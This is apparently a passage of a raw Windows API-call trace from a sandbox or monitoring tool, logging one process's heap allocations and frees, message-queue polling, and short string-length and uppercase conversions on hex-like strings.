[0081.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0380 [0081.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0380 | out: hHeap=0x2af0000) returned 1 [0081.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebda0 [0081.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0370 | out: hHeap=0x2af0000) returned 1 [0081.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x29ebd58 [0081.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x29e6018 [0081.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebd28 [0081.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e03f0 [0081.868] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebd28 | out: hHeap=0x2af0000) returned 1 [0081.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x29e5ed8 [0081.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebcf8 [0081.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebbc0 [0081.868] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0081.869] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebc50 [0081.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0370 [0081.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebc50 | out: hHeap=0x2af0000) returned 1 [0081.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x29e5f00 [0081.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebdb8 [0081.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebbd8 [0081.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0380 [0081.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x29e5f50 [0081.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebd70 [0081.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e03c0 [0081.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebd70 | out: hHeap=0x2af0000) returned 1 [0081.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x29e5f28 [0081.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebba8 [0081.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebc08 [0081.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e5f00 | out: hHeap=0x2af0000) returned 1 [0081.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0370 | out: hHeap=0x2af0000) returned 1 [0081.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebdb8 | out: hHeap=0x2af0000) returned 1 [0081.869] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x29e5f78 [0081.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebd10 [0081.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0370 [0081.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebc98 [0081.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0410 [0081.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0410 | out: hHeap=0x2af0000) returned 1 [0081.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0410 [0081.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebc20 [0081.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebb30 [0081.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e05e0 [0081.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebc38 [0081.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e05e0 | out: hHeap=0x2af0000) returned 1 [0081.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebc38 | out: hHeap=0x2af0000) returned 1 [0081.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebb30 | out: hHeap=0x2af0000) returned 1 [0081.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebc20 | out: hHeap=0x2af0000) returned 1 [0081.869] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0410 | out: hHeap=0x2af0000) returned 1 [0081.869] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0410 [0081.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0410 | out: hHeap=0x2af0000) returned 1 [0081.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ed00 [0081.870] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0410 [0081.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebcb0 [0081.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebd28 [0081.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0690 [0081.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebc38 [0081.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebc20 [0081.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0610 [0081.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebc50 [0081.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebcc8 [0081.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0500 [0081.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebce0 [0081.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0500 | out: hHeap=0x2af0000) returned 1 [0081.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebd70 [0081.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0500 [0081.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0500 | out: hHeap=0x2af0000) returned 1 [0081.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebd88 [0081.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0500 [0081.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0500 | out: hHeap=0x2af0000) returned 1 [0081.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebc68 [0081.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0500 [0081.870] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebdb8 [0081.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebce0 | out: hHeap=0x2af0000) returned 1 [0081.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebcc8 | out: hHeap=0x2af0000) returned 1 [0081.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebd70 | out: hHeap=0x2af0000) returned 1 [0081.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebd88 | out: hHeap=0x2af0000) returned 1 [0081.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebc50 | out: hHeap=0x2af0000) returned 1 [0081.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0610 | out: hHeap=0x2af0000) returned 1 [0081.870] lstrlenW (lpString="20") returned 2 [0081.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebc68 | out: hHeap=0x2af0000) returned 1 [0081.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0500 | out: hHeap=0x2af0000) returned 1 [0081.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebdb8 | out: hHeap=0x2af0000) returned 1 [0081.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebc20 | out: hHeap=0x2af0000) returned 1 [0081.870] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebc38 | out: hHeap=0x2af0000) returned 1 [0081.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0690 | out: hHeap=0x2af0000) returned 1 [0081.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebc50 [0081.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebd88 [0081.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0570 [0081.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebd28 | out: hHeap=0x2af0000) returned 1 [0081.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebcb0 | out: hHeap=0x2af0000) returned 1 [0081.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0410 | out: hHeap=0x2af0000) returned 1 [0081.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebd88 | out: hHeap=0x2af0000) returned 1 [0081.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0570 | out: hHeap=0x2af0000) returned 1 [0081.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebc50 | out: hHeap=0x2af0000) returned 1 [0081.871] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.871] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e05e0 [0081.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebb00 [0081.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebc38 [0081.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0610 [0081.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebb18 [0081.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebc20 [0081.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0690 [0081.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebd70 [0081.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebad0 [0081.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0500 [0081.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebc50 [0081.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0500 | out: hHeap=0x2af0000) returned 1 [0081.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebb30 [0081.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0500 [0081.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0500 | out: hHeap=0x2af0000) returned 1 [0081.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebdb8 [0081.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0570 [0081.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0570 | out: hHeap=0x2af0000) returned 1 [0081.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebc68 [0081.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0570 [0081.871] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebcb0 [0081.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebc50 | out: hHeap=0x2af0000) returned 1 [0081.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebad0 | out: hHeap=0x2af0000) returned 1 [0081.871] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebb30 | out: hHeap=0x2af0000) returned 1 [0081.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebdb8 | out: hHeap=0x2af0000) returned 1 [0081.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebd70 | out: hHeap=0x2af0000) returned 1 [0081.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0690 | out: hHeap=0x2af0000) returned 1 [0081.872] lstrlenW (lpString="32") returned 2 [0081.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebc68 | out: hHeap=0x2af0000) returned 1 [0081.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0570 | out: hHeap=0x2af0000) returned 1 [0081.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebcb0 | out: hHeap=0x2af0000) returned 1 [0081.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebc20 | out: hHeap=0x2af0000) returned 1 [0081.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebb18 | out: hHeap=0x2af0000) returned 1 [0081.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e0610 | out: hHeap=0x2af0000) returned 1 [0081.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebb18 [0081.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebb30 [0081.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0610 [0081.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebc38 | out: hHeap=0x2af0000) returned 1 [0081.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29ebb00 | out: hHeap=0x2af0000) returned 1 [0081.872] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29e05e0 | out: hHeap=0x2af0000) returned 1 [0081.872] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.872] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e05e0 [0081.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebc20 [0081.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebc38 [0081.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0570 [0081.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebad0 [0081.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebd28 [0081.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0610 [0081.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebcc8 [0081.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebc50 [0081.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0690 [0081.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebc68 [0081.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebcb0 [0081.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0500 [0081.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebce0 [0081.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0690 [0081.872] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebd70 [0081.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0690 [0081.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebd88 [0081.873] lstrlenW (lpString="34") returned 2 [0081.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebcc8 [0081.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebc50 [0081.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x29e0610 [0081.873] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.873] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0690 [0081.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebd70 [0081.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebd88 [0081.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x29e0500 [0081.873] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x29ebce0 [0081.873] lstrlenW (lpString="20") returned 2 [0081.873] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.873] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.873] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0081.873] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.873] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.873] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.873] lstrlenW (lpString="20") returned 2 [0081.873] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.873] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.873] lstrlenW (lpString="2D") returned 2 [0081.873] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.873] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.873] lstrlenW (lpString="32") returned 2 [0081.873] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.873] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.873] lstrlenW (lpString="36") returned 2 [0081.873] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.874] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.874] lstrlenW (lpString="38") returned 2 [0081.874] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.874] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.874] lstrlenW (lpString="34") returned 2 [0081.874] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.874] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.874] lstrlenW (lpString="33") returned 2 [0081.874] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.874] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.874] lstrlenW (lpString="35") returned 2 [0081.874] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.874] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.874] lstrlenW (lpString="34") returned 2 [0081.874] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.874] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.874] lstrlenW (lpString="35") returned 2 [0081.874] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.874] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.874] lstrlenW (lpString="36") returned 2 [0081.874] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.874] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.874] lstrlenW (lpString="20") returned 2 [0081.874] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.874] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.874] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0081.874] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.874] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.875] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.875] lstrlenW (lpString="20") returned 2 [0081.875] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.875] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.875] lstrlenW (lpString="31") returned 2 [0081.875] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.875] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.875] lstrlenW (lpString="20") returned 2 [0081.875] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.875] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.875] CharUpperBuffW (in: lpsz="A4300005D31", cchLength=0xb | out: lpsz="A4300005D31") returned 0xb [0081.875] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf488) returned 0 [0081.875] PeekMessageW (in: lpMsg=0x8cf488, hWnd=0x0, wMsgFilterMin=0x0, 